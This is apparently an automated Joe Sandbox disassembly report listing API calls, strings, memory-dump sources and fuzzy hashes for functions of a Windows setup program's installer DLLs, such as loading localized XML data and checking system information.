                                                                                              • String ID: OpenFileMapping fails with last error:
                                                                                              • API String ID: 2964829354-1738344248
                                                                                              • Opcode ID: cd3ad49fd0cc917af3889bdae8576c60ed94473393176100c3971fc2dd33a075
                                                                                              • Instruction ID: d7f6e9a0c834de5b7b750e96f41b10bd6b0275f9626be62624037d9e96f3149e
                                                                                              • Opcode Fuzzy Hash: cd3ad49fd0cc917af3889bdae8576c60ed94473393176100c3971fc2dd33a075
                                                                                              • Instruction Fuzzy Hash: D9215B71600118ABCB20DFA9CA09EDE7BB5FF5A358F108625F9259BB54C730CA05DB91
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C90ACDF
                                                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000000,00000000,00000009,0000000C,6C8F49C0,6C8BA5D8,6C8BA54C), ref: 6C90AD06
                                                                                              • GetLastError.KERNEL32 ref: 6C90AD08
                                                                                              • GetTokenInformation.KERNELBASE(00000002,00000001(TokenIntegrityLevel),00000008,00000400,00000400,80070216), ref: 6C90AD81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationToken$ErrorH_prolog3_Last
                                                                                              • String ID:
                                                                                              • API String ID: 654496852-0
                                                                                              • Opcode ID: b4fde8c31d97e8d97b86eb9506b595eb307f986b8159bf66c1fa8a7ade4e94e0
                                                                                              • Instruction ID: 773eb9620879b6b3c4a30463da43112d88eee35ce4d2ccbd566bcaa720469f7e
                                                                                              • Opcode Fuzzy Hash: b4fde8c31d97e8d97b86eb9506b595eb307f986b8159bf66c1fa8a7ade4e94e0
                                                                                              • Instruction Fuzzy Hash: 06310132B40529DBCF11CF68C941ADE77B9AF15B69B214019E940BBA50CB30CE45CBE0
                                                                                              APIs
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8D5B82: __EH_prolog3_GS.LIBCMT ref: 6C8D5B8C
                                                                                                • Part of subcall function 6C8D5B82: _memset.LIBCMT ref: 6C8D5BBB
                                                                                                • Part of subcall function 6C8D5B82: FindFirstFileW.KERNEL32(?,?,????), ref: 6C8D5BDA
                                                                                                • Part of subcall function 6C8D5B82: FindClose.KERNEL32(?), ref: 6C8D5CC1
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D5FF0
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,LocalizedData.xml,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C8D5EF1
                                                                                                • Part of subcall function 6C8D5CE1: __EH_prolog3.LIBCMT ref: 6C8D5CE8
                                                                                                • Part of subcall function 6C8D5CE1: CoInitialize.OLE32(00000000), ref: 6C8D5D1A
                                                                                                • Part of subcall function 6C8D5CE1: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,?,?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000), ref: 6C8D5D38
                                                                                                • Part of subcall function 6C8D5CE1: CoUninitialize.COMBASE(?,?,00000014,6C8D5F14,?,?,?,?,38D98A99,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C8D5DE8
                                                                                                • Part of subcall function 6C8D5CE1: SysFreeString.OLEAUT32(00000738), ref: 6C8D5DF1
                                                                                              Strings
                                                                                              • LocalizedData.xml in resource folder %s, does not have a Language element, xrefs: 6C8D5F87
                                                                                              • ParameterInfo.xml, xrefs: 6C8D5E45, 6C8D5FA2
                                                                                              • LocalizedData.xml, xrefs: 6C8D5EDF
                                                                                              • LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml, xrefs: 6C8D6026
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$FindH_prolog3Path$AppendCloseCreateException@8ExistsFirstFreeH_prolog3_InitializeInstanceModuleNameStringThrowUninitialize_memcpy_s_memset
                                                                                              • String ID: LocalizedData.xml$LocalizedData.xml in resource folder %s, does not have a Language element$LocalizedData.xml is missing in resource folder %s. Every resource folder needs a LocalizedData.xml$ParameterInfo.xml
                                                                                              • API String ID: 2922719316-412676173
                                                                                              • Opcode ID: 4563567076355a4f2a6407e931460d3e8ab3a9c938767b49ab543d3f47ec5c22
                                                                                              • Instruction ID: 7b6e62eb53a7512f4f01bfd39ae3e68f61630d3e35f6dbcb4f84ff2e11598351
                                                                                              • Opcode Fuzzy Hash: 4563567076355a4f2a6407e931460d3e8ab3a9c938767b49ab543d3f47ec5c22
                                                                                              • Instruction Fuzzy Hash: F2615A725083859FC710DFA8C944A8AB7E8FF95318F054E6EF0A59BA51DB30E509CB93
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C904026
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C904041
                                                                                              • GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104), ref: 6C9040B3
                                                                                              • PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C904101
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileH_prolog3$ExistsLocaleModuleNamePathThread
                                                                                              • String ID: %04d\%s$DHTMLHeader.html
                                                                                              • API String ID: 3575165106-1224721414
                                                                                              • Opcode ID: 604e8d05463472135efceb022f45c16a2a3545a7adafd62123dc7fbb9e8f4cfc
                                                                                              • Instruction ID: fbe2d60e5570541ccf17fb55cda9627a67788a9b5c6a0c51ca69074f69f9cb5b
                                                                                              • Opcode Fuzzy Hash: 604e8d05463472135efceb022f45c16a2a3545a7adafd62123dc7fbb9e8f4cfc
                                                                                              • Instruction Fuzzy Hash: 4241A27191010ADFCF14DFA8CC45AEEBBB5BF21318F104929E111A7B51DB34DA0ACB94
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639533FA
                                                                                              • LoadLibraryW.KERNELBASE(?,00000008,63953377,?), ref: 63953427
                                                                                              • GetLastError.KERNEL32 ref: 63953437
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              • GetLastError.KERNEL32 ref: 6395344B
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6395346E
                                                                                              Strings
                                                                                              • ::LoadLibrary(%s) failed with error %d, xrefs: 6395343C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last$Exception@8LibraryLoadThrow
                                                                                              • String ID: ::LoadLibrary(%s) failed with error %d
                                                                                              • API String ID: 3804648058-20907036
                                                                                              • Opcode ID: 7cbfec88d4243ec72b6c96a8fa5f5efb775a09f2fd4e93375f161ba9c91e331f
                                                                                              • Instruction ID: ab2b43ed1b83d98d8045248c50b4c915a44568a2cf0f2cc702181b8879a157f7
                                                                                              • Opcode Fuzzy Hash: 7cbfec88d4243ec72b6c96a8fa5f5efb775a09f2fd4e93375f161ba9c91e331f
                                                                                              • Instruction Fuzzy Hash: 7F01DFB18042069FEB10EFA8C844B6E7BB0FF12B04F108124E018DF242DB30D9218FA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C548C
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C8C7DAF,?,?,?,?,?,00000000,?,?,6C8BAB18,00000008,6C8C7CD9), ref: 6C8C549C
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C8C54B9
                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 6C8C54E0
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AddressHandleInfoModuleNativeProcSystem
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2427612476-192647395
                                                                                              • Opcode ID: 6e04438b3e998a018113ca28b73e3ed3c219a15aa55988f34e923a885d621473
                                                                                              • Instruction ID: d12d55b0574c0ff579d1d485eecbc9c689114f4a13bc88cd2af578b6d7a23540
                                                                                              • Opcode Fuzzy Hash: 6e04438b3e998a018113ca28b73e3ed3c219a15aa55988f34e923a885d621473
                                                                                              • Instruction Fuzzy Hash: 02F0C231B10615ABDF20DBA4DA04BCE3276AB90309F108C24F000E7F00DBBCD549E695
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63963E67
                                                                                              • SetWindowLongW.USER32(?,000000F4,00000066), ref: 63963E7B
                                                                                                • Part of subcall function 6394FF14: EnumChildWindows.USER32(?,Function_0000FF39,?), ref: 6394FF21
                                                                                              • GetParent.USER32(?), ref: 63963EB7
                                                                                              • SendMessageW.USER32(00000000,00000485,00000000,00000066), ref: 63963EC2
                                                                                              • GetParent.USER32(?), ref: 63963ECF
                                                                                              • GetDesktopWindow.USER32 ref: 63963ED4
                                                                                                • Part of subcall function 63968E26: HeapFree.KERNEL32(00000000,00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E3C
                                                                                                • Part of subcall function 63968E26: GetLastError.KERNEL32(00000000,?,63969BCC,00000000,?,6396B575,63969054), ref: 63968E4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ParentWindow$ChildDesktopEnumErrorFreeH_prolog3HeapLastLongMessageSendWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1093383602-0
                                                                                              • Opcode ID: 491848130d23c3b46c4025fa47c59850825ca860e0373fed2c41d433f4c843bd
                                                                                              • Instruction ID: 4ba417e681d4c52cc61d15ed7d0c7eee25b377d5ce541d2d133f48751edcb591
                                                                                              • Opcode Fuzzy Hash: 491848130d23c3b46c4025fa47c59850825ca860e0373fed2c41d433f4c843bd
                                                                                              • Instruction Fuzzy Hash: D6111870D00708DFDB21EFA9C98499EBBF4BF9AB44B10451AE125EB2A0DB71D910CF50
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C8FF8D8
                                                                                              • GetCommandLineW.KERNEL32(00000044,6C8F8323,00000000), ref: 6C8FF8EA
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • __time64.LIBCMT ref: 6C8FFA7B
                                                                                                • Part of subcall function 6C8F72E4: __EH_prolog3_catch.LIBCMT ref: 6C8F72EB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_catch$CommandH_prolog3Line__time64
                                                                                              • String ID: %TEMP%\$Setup
                                                                                              • API String ID: 3716462386-3413213476
                                                                                              • Opcode ID: 1d73eb0969d54761b97ff035e6bc2467b3987314472f1be157ee755fc1a58ed8
                                                                                              • Instruction ID: 90f7b5424578708fb97b8aafb355cd9bb1b90ab4ffe62f72c854c215609c49d2
                                                                                              • Opcode Fuzzy Hash: 1d73eb0969d54761b97ff035e6bc2467b3987314472f1be157ee755fc1a58ed8
                                                                                              • Instruction Fuzzy Hash: 92713A719002099FCB10CFA8CA84AEDBBF5BF59318F24456AE461B7790DB349A49CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E3EB9
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: ProcessBlocks$ProductDriveHints$ServiceBlocks$SystemCheck
                                                                                              • API String ID: 431132790-3784926136
                                                                                              • Opcode ID: cb3ca5ce9fc7ddcbd0a0ee4fbb8115be6168f268398476f06b43ba0c0180cf1c
                                                                                              • Instruction ID: 45a798294f2a57743a34112c59c52016665cd73f30d8a8e7e171e526917ded59
                                                                                              • Opcode Fuzzy Hash: cb3ca5ce9fc7ddcbd0a0ee4fbb8115be6168f268398476f06b43ba0c0180cf1c
                                                                                              • Instruction Fuzzy Hash: BA517071904249EFDF10DFA8CA45AEE7BB9AF0A318F144959F814DB781C734DA05CB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F5698
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,?), ref: 6C8F5735
                                                                                              • PathFileExistsW.SHLWAPI(00000001,?), ref: 6C8F57C3
                                                                                              Strings
                                                                                              • pLocalPath is NULL!!!!!!, xrefs: 6C8F585B
                                                                                              • Package authoring error. The Url for this item is not authored and the item does not exist locally: , xrefs: 6C8F57FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFileH_prolog3Relative
                                                                                              • String ID: Package authoring error. The Url for this item is not authored and the item does not exist locally: $pLocalPath is NULL!!!!!!
                                                                                              • API String ID: 1035510722-3253188715
                                                                                              • Opcode ID: 54a3ab422431ec9095eb1291f8df9957a00dabea0d2535d2b5ab3dbe43e5adfc
                                                                                              • Instruction ID: 2a13ca554196a5d0b584eb58e83603647d90c4d82ead733105fa28d1d701ee8a
                                                                                              • Opcode Fuzzy Hash: 54a3ab422431ec9095eb1291f8df9957a00dabea0d2535d2b5ab3dbe43e5adfc
                                                                                              • Instruction Fuzzy Hash: 90510A7190020DDFCF20DFA8C9419EE7BB8AF15358F158965E420EBB51C734DA19CBA2
                                                                                              APIs
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                                • Part of subcall function 6C8D57E5: __EH_prolog3.LIBCMT ref: 6C8D57EC
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8CA8CC: SetFilePointer.KERNEL32(?,00000000,6C8BA794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C8CAA49
                                                                                                • Part of subcall function 6C8CA8CC: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CAA97
                                                                                                • Part of subcall function 6C8CA8CC: SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C8CAAAC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D578A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D5799
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C8D57C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3String$FileFree$PathRelative$AllocCommandException@8LineModuleNamePointerReadThrow_memcpy_s
                                                                                              • String ID: ParameterInfo.xml$UiInfo.xml
                                                                                              • API String ID: 3873923459-386449131
                                                                                              • Opcode ID: 4d881244b8733a975ee381aaf1af8dcc92c88472666a28caf07b0ff43028c172
                                                                                              • Instruction ID: 08d10b0593ba9c94f26f50045469761b73b1a0c896ada88c913cf72c019d42b8
                                                                                              • Opcode Fuzzy Hash: 4d881244b8733a975ee381aaf1af8dcc92c88472666a28caf07b0ff43028c172
                                                                                              • Instruction Fuzzy Hash: 9B31BFB2508345AFCB10DF68C941A8BBBE8FFA5628F140E1EF490D7750D734E5088BA2
                                                                                              APIs
                                                                                                • Part of subcall function 6C8D5044: __EH_prolog3.LIBCMT ref: 6C8D504B
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,38D98A99,?,?,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794), ref: 6C9097B2
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C90985E
                                                                                                • Part of subcall function 6C8D4798: __EH_prolog3.LIBCMT ref: 6C8D479F
                                                                                                • Part of subcall function 6C8D50D5: __EH_prolog3_catch.LIBCMT ref: 6C8D50DC
                                                                                                • Part of subcall function 6C8D50D5: CoInitialize.OLE32(00000000), ref: 6C8D512A
                                                                                                • Part of subcall function 6C8D50D5: CoCreateInstance.OLE32(6C8BA974,00000000,00000017,6C8BA9A4,00000738,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D5148
                                                                                                • Part of subcall function 6C8D50D5: CoUninitialize.COMBASE(02F92298,?,succeeded,?,?,?,00000000,?,?,?,38D98A99,?,?,?), ref: 6C8D51E6
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909818
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C909833
                                                                                              Strings
                                                                                              • Loading localized engine data for language %d from %s, xrefs: 6C90977B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrowUninitialize
                                                                                              • String ID: Loading localized engine data for language %d from %s
                                                                                              • API String ID: 509998568-3315213612
                                                                                              • Opcode ID: 9ec0c4df1929ee05067cccb004f3686f66932ec7f1dd8e316a135762a2df2b54
                                                                                              • Instruction ID: 96d4f579bdb4028b56e563730d29410e35c0b09e9ac8c51adc3cda5db25dd069
                                                                                              • Opcode Fuzzy Hash: 9ec0c4df1929ee05067cccb004f3686f66932ec7f1dd8e316a135762a2df2b54
                                                                                              • Instruction Fuzzy Hash: 17416272108344AFC711DF68C845A9BBBE8AF95328F004E2EF49592690DB34D908CB96
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D19B4
                                                                                                • Part of subcall function 6C8C8B9F: __EH_prolog3.LIBCMT ref: 6C8C8BA6
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D1ADE
                                                                                              Strings
                                                                                              • ParameterInfo.xml, xrefs: 6C8D1902, 6C8D1A2F
                                                                                              • can only have one logical or arithmietic expression for a child node, xrefs: 6C8D1A54
                                                                                              • schema validation failure: , xrefs: 6C8D1A40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
